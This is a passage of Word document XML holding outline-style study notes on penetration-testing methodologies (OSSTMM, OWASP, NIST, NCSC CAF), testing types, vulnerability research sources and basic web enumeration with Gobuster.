          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E676C3A" w14:textId="21A5F2DF" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>OSSTMM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7663167F" w14:textId="092156D2" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>methodology for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0C7860" w14:textId="423B9085" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>telecoms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3223D3A4" w14:textId="496ED320" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>wired networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA64F63" w14:textId="58D5CDF0" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>wireless communications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4A642E" w14:textId="3926E8D6" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BF2725" w14:textId="7024DE0F" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>web applications and services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5167D624" w14:textId="2C488EAE" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>top ten security vulns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76967077" w14:textId="1C6FB315" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>testing and remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0435FCBB" w14:textId="507417BE" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>NIST Cybersecurity Framework 1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BFC5FE" w14:textId="386E5003" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>security controls and benchmarks for success for organizations from critical infrastructure and commercial</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B005189" w14:textId="2D41F2E8" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>NCSC CAF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5610735D" w14:textId="42996E26" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>fourteen principles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132390C8" w14:textId="7C1CD82A" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>access risk of threats and organizational defense</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799DAC87" w14:textId="0543E290" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>data security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18576982" w14:textId="448E4826" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>system security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2172C22F" w14:textId="4BAAEA40" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>identity and access control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E024D9" w14:textId="69D85471" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>resiliency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2C6FA8" w14:textId="61EDBF42" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CF1F77" w14:textId="4A334664" w:rsidR="000A2554" w:rsidRDefault="000A2554" w:rsidP="000A2554">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>response and recovery planning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C20419F" w14:textId="4857388C" w:rsidR="004037B1" w:rsidRDefault="004037B1" w:rsidP="004037B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Black Box, White Box, Grey Box Penetration Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5521377D" w14:textId="20571F25" w:rsidR="004037B1" w:rsidRDefault="004037B1" w:rsidP="004037B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Black-Box Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4952843D" w14:textId="4A144420" w:rsidR="004037B1" w:rsidRDefault="004037B1" w:rsidP="004037B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>no knowledge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06865845" w14:textId="3FCC2C0B" w:rsidR="004037B1" w:rsidRDefault="004037B1" w:rsidP="004037B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Grey-Box Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C27DB6" w14:textId="784BAB00" w:rsidR="004037B1" w:rsidRDefault="004037B1" w:rsidP="004037B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>partial knowledge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EC123E" w14:textId="332AC7C1" w:rsidR="004037B1" w:rsidRDefault="004037B1" w:rsidP="004037B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>White-Box Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B02854" w14:textId="780D4D93" w:rsidR="004037B1" w:rsidRPr="00F512ED" w:rsidRDefault="004037B1" w:rsidP="004037B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>full knowledge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0E7FB6" w14:textId="37161696" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CCAE651" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Introduction to Research</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF29DC6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>crawler searching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9B816E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>ExploitDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C14442" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>search after discovering software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15647604" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>NVD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A10295B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>CVE Mitre</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690F60D9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>searchsploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F51992" w14:textId="7F7AB0A0" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>man command for tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4725C5AF" w14:textId="77777777" w:rsidR="00AC6BAD" w:rsidRDefault="00AC6BAD" w:rsidP="00F512ED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DDD77D3" w14:textId="747943A1" w:rsidR="00AC6BAD" w:rsidRDefault="00AC6BAD" w:rsidP="00F512ED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Web Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B246E19" w14:textId="4BDA4674" w:rsidR="00AC6BAD" w:rsidRDefault="00AC6BAD" w:rsidP="00AC6BAD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Manual Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCDAD94" w14:textId="03367AEA" w:rsidR="00AC6BAD" w:rsidRDefault="00AC6BAD" w:rsidP="00AC6BAD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Developers Console/Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C162791" w14:textId="53335AF1" w:rsidR="00AC6BAD" w:rsidRDefault="00AC6BAD" w:rsidP="00AC6BAD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>View page source code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7434B85F" w14:textId="1975DDF1" w:rsidR="00AC6BAD" w:rsidRDefault="00AC6BAD" w:rsidP="00AC6BAD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>comments in HTML as &lt;!- -&gt; tags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361F33CE" w14:textId="4A7F2592" w:rsidR="00AC6BAD" w:rsidRDefault="00AC6BAD" w:rsidP="00AC6BAD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>finding assets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD13AF1" w14:textId="59D0366C" w:rsidR="00AC6BAD" w:rsidRDefault="00AC6BAD" w:rsidP="00AC6BAD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>debugging and executing code client-side</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C4BF34" w14:textId="0E02BAC3" w:rsidR="00AC6BAD" w:rsidRDefault="00AC6BAD" w:rsidP="00AC6BAD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction to Gobuster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C38703" w14:textId="1C06B907" w:rsidR="00AC6BAD" w:rsidRDefault="00045C44" w:rsidP="00AC6BAD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F50641" w14:textId="1F12A257" w:rsidR="00045C44" w:rsidRDefault="00045C44" w:rsidP="00045C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo apt install gobuster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EA9CB4" w14:textId="41D5B059" w:rsidR="00045C44" w:rsidRDefault="00045C44" w:rsidP="00045C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Global Flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDB2D5C" w14:textId="1C464769" w:rsidR="00045C44" w:rsidRDefault="007A6E65" w:rsidP="00045C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="00045C44" w:rsidRPr="009D7B28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/OJ/gobuster</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="56BA5DD2" w14:textId="5F9D8B48" w:rsidR="00045C44" w:rsidRPr="00074E88" w:rsidRDefault="00045C44" w:rsidP="00045C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00074E88">
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://github.com/OJ/gobuster#dir-mode-options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257D07BB" w14:textId="1A8294F4" w:rsidR="00045C44" w:rsidRDefault="00045C44" w:rsidP="00045C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-t = - -threads = number of concurrent threads (default 10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE7F24A" w14:textId="10C45390" w:rsidR="00045C44" w:rsidRDefault="00045C44" w:rsidP="00045C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-v = - -verbose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504550A4" w14:textId="59133454" w:rsidR="00045C44" w:rsidRDefault="00045C44" w:rsidP="00045C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
